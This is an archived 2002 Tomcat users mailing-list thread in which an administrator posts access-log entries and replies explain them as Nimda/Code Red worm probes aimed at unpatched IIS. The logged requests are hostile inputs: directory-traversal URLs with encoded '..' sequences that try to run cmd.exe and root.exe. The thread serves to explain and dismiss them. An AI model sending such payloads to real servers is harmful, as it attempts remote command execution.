You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@tomcat.apache.org by Laszlo Nadai <ln...@jnet1.com> on 2002/12/29 14:39:22 UTC
Tomcat log entries
I am fairly new to Tomcat, scripts, etc.
I found the following and similar entries in my access log file:
64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 624
64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 618
64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
64.160.45.159 - - [28/Dec/2002:15:00:18 -0800] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718
64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721
64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715
64.160.45.159 - - [28/Dec/2002:16:01:56 -0800] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 624
64.160.45.159 - - [28/Dec/2002:16:01:56 -0800] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 618
64.160.45.159 - - [28/Dec/2002:16:01:58 -0800] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
64.160.45.159 - - [28/Dec/2002:16:02:00 -0800] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
64.160.45.159 - - [28/Dec/2002:16:02:04 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718
64.160.45.159 - - [28/Dec/2002:16:02:06 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:16:02:07 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:16:02:09 -0800] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721
64.160.45.159 - - [28/Dec/2002:16:02:10 -0800] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715
64.165.213.97 - - [28/Dec/2002:16:38:12 -0800] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 624
64.165.213.97 - - [28/Dec/2002:16:38:16 -0800] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 618
64.165.213.97 - - [28/Dec/2002:16:38:20 -0800] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
64.165.213.97 - - [28/Dec/2002:16:38:24 -0800] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
Can someone tell me what someone else was trying to do?
Based on the log, should I change any settings in my config?
Thanks,
laszlo
-
[This E-mail scanned for viruses by declude AntiVirus Software]
--
To unsubscribe, e-mail: <ma...@jakarta.apache.org>
For additional commands, e-mail: <ma...@jakarta.apache.org>
Re: Tomcat log entries
Posted by Bill Barker <wb...@wilshire.com>.
This is simply some Windows server that is infected with the Nimbda Worm
looking for a new place to crawl to. It only infects non-patched IIS
servers, so for Tomcat stand-alone or Apache, you can safely ignore it.
"Laszlo Nadai" <ln...@jnet1.com> wrote in message
news:3E0EFB0A.85E9995C@jnet1.com...
> I am fairly new to Tomcat, scripts, etc.
> I found the following and similar entries in my access log file:
>
> 64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 624
> 64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 618
> 64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
> 64.160.45.159 - - [28/Dec/2002:15:00:18 -0800] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
> 64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718
> 64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
> 64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
> 64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721
> 64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715
> 64.160.45.159 - - [28/Dec/2002:16:01:56 -0800] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 624
> 64.160.45.159 - - [28/Dec/2002:16:01:56 -0800] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 618
> 64.160.45.159 - - [28/Dec/2002:16:01:58 -0800] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
> 64.160.45.159 - - [28/Dec/2002:16:02:00 -0800] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
> 64.160.45.159 - - [28/Dec/2002:16:02:04 -0800] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718
> 64.160.45.159 - - [28/Dec/2002:16:02:06 -0800] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
> 64.160.45.159 - - [28/Dec/2002:16:02:07 -0800] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
> 64.160.45.159 - - [28/Dec/2002:16:02:09 -0800] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721
> 64.160.45.159 - - [28/Dec/2002:16:02:10 -0800] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715
> 64.165.213.97 - - [28/Dec/2002:16:38:12 -0800] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 624
> 64.165.213.97 - - [28/Dec/2002:16:38:16 -0800] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 618
> 64.165.213.97 - - [28/Dec/2002:16:38:20 -0800] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
> 64.165.213.97 - - [28/Dec/2002:16:38:24 -0800] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
>
> Can someone tell me what someone else was trying to do?
> Based on the log, should I change any settings in my config?
>
> Thanks,
> laszlo
>
>
> -
> [This E-mail scanned for viruses by declude AntiVirus Software]
--
To unsubscribe, e-mail: <ma...@jakarta.apache.org>
For additional commands, e-mail: <ma...@jakarta.apache.org>
RE: Tomcat log entries
Posted by "Rob A. Augustinus" <de...@siulintao.net>.
These are typical 'code red' (afaik?) entries in your log..
Some infected server is still trying to infect your server,
not that it will be infected but it will try for a certain
amount of times at least. You could create a valid link to
a null sized file to handle it. Which causes less load on
your system than an 404. other than that.. There's little
to be done about it.. (unless you can track down the admin
of that box, and tell him to fix his server)
Rob
-----Original Message-----
From: Laszlo Nadai [mailto:lnadai@jnet1.com]
Sent: Sunday, December 29, 2002 5:39
To: 'Tomcat Users List'
Subject: Tomcat log entries
I am fairly new to Tomcat, scripts, etc.
I found the following and similar entries in my access log file:
64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 624 64.160.45.159 - -
[28/Dec/2002:15:00:17 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404
618 64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648 64.160.45.159 - -
[28/Dec/2002:15:00:18 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 648 64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718
64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721
64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715
64.160.45.159 - - [28/Dec/2002:16:01:56 -0800] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 624 64.160.45.159 - -
[28/Dec/2002:16:01:56 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404
618 64.160.45.159 - - [28/Dec/2002:16:01:58 -0800] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648 64.160.45.159 - -
[28/Dec/2002:16:02:00 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 648 64.160.45.159 - - [28/Dec/2002:16:02:04 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718
64.160.45.159 - - [28/Dec/2002:16:02:06 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:16:02:07 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:16:02:09 -0800] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721
64.160.45.159 - - [28/Dec/2002:16:02:10 -0800] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715
64.165.213.97 - - [28/Dec/2002:16:38:12 -0800] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 624 64.165.213.97 - -
[28/Dec/2002:16:38:16 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404
618 64.165.213.97 - - [28/Dec/2002:16:38:20 -0800] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648 64.165.213.97 - -
[28/Dec/2002:16:38:24 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 648
Can someone tell me what someone else was trying to do?
Based on the log, should I change any settings in my config?
Thanks,
laszlo
-
[This E-mail scanned for viruses by declude AntiVirus Software]
--
To unsubscribe, e-mail:
<ma...@jakarta.apache.org>
For additional commands, e-mail:
<ma...@jakarta.apache.org>
--
To unsubscribe, e-mail: <ma...@jakarta.apache.org>
For additional commands, e-mail: <ma...@jakarta.apache.org>